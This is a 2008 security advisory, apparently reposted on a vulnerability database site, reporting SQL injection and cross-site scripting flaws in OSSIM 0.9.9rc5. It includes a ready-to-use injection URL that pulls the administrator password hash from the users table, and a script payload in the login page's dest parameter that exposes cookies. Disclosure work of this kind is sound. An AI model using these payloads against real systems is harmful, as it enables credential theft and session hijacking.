SQL-injection, XSS in OSSIM (Open Source Security Information Management)

2008-02-22 / 2008-02-23
Credit: Marcin Kopec
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79

Application: OSSIM http://www.ossim.net Version: 0.9.9rc5 Note: it is possible that the problem affects also earlier OSSIM versions Platforms: Linux Bug: SQL injection, Cross Site Scripting Exploitation: remote Date: 21 Feb 2008 Author: Marcin Kopec E-mail: marcin(dot)kopec(at)hotmail(dot)com --------------------------------------- 1) Introduction OSSIM it's a free implementation of Security Information Management (SIM) system, equipped with many useful security tools (nessus, snort, p0f, ntop, ...) managed from easy-to-use web panel. 2) SQL injection The bug exist in portname parameter of modifyportform.php It's possible to obtain hashed administrator password when user have rights to do port modification in "PORTS" tab. http://[host]/ossim/port/modifyportform.php?portname=ANY'%20and%201=2%20 union%20select%20pass,2%20from%20ossim.users%20where%20login='admin 3) XSS Quotes in OSSIM aren't property sanitized. Below XSS may be executed without logging into the OSSIM. http://[host]/ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(docum ent.cookie)%3C/script%3E%3C!--


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top